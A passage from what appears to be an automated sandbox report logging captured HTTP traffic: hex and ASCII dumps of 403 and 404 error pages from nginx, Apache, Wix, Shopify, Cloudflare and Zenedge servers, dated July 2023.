65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><met
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487540.6064078575031328X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:52:20 GMTX-Served-By: cache-lin2290027-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NYMupe6WQf6MVMrzEUOojILGWbh2TIJ0L1y7rVT4gFiP,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:52:20 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:52:21 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:22 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:22 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:23 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMeMFZ26VdsJbR9Jf1fRFJeq,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=X-Wix-Request-Id: 1690487543.6091092056524181X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:52:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=13X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 5edb9747-7ef8-4d2d-8484-db3e2f7f6e0dCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gux4mTl9toWxxfRD5EkyHWLzocpGZJCAuWyo9OYzKXXbBeaRNPHbTWuoXdJUVqKbbQmxGyq6ISKYC9JVc3dybg0mjOkDuC5Uqbjj8lmgaUfVzbE8G%2FILmHm1PkxaPCaMCg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=151.999950Server: cloudflareCF-RAY: 7ed76c36ecda3605-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:52:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=21X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 7aee33a6-fc34-47ed-b814-2c1d6e2d485dCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBjGgk%2Bk76hju1g1vEuW4rWEoRL1DqyMF1CehfeAr1UyodekCHu4Dk4%2FAOHrCUY9qrdatEXAr2WSkxSAkXajKOaajlML8t1WCt%2BWxzVK%2FAH%2F0Zsv7t%2FtNmExP7ICMt0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=159.999847Server: cloudflareCF-RAY: 7ed76c3749393722-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:52:15 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Thu, 27 Jul 2023 19:52:28 GMTX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Server: ZENEDGEX-Zen-Fury: 3a71c942c233b8d553c80c74daf5139c554e6df9Data Raw: 32 61 38 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 37 22 2c 20 31 36 39 30 34 38 37 35 34 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 37 35 34 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 39 39 36 34 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 35 34 3a 32 38 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2a8<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC47", 1690487548, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690487548 * 3.1415926535898; v = Math.floor(v); document.c
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:44 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:44 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:47 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ekKCMrxdZtZUWID91DineICVYAwu73UXxzU68Bs%2FDLiA1Km8p7AcOlyrpuJsrfFrRaKwfblqMunct5R%2BQhw%2FhYen9kjtpZZtrT3lTDxufcrqmF2%2BUFtNDIY6n6fPXJS7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76cbdf8fe697b-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:47 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y0eLFCRzNG6ciF6OmQBXfvDq%2B493ypSGzDtYOrr7BzdEV2rFHE29YeIa%2BSGyWmt%2B4%2FCgqgxFGkzj7zCo%2FUXA86mepjgit2MAaQv%2FzBKX2L2Mwn4G%2FHlcolJqGLG3rvCh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76cbf1a8e697b-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data 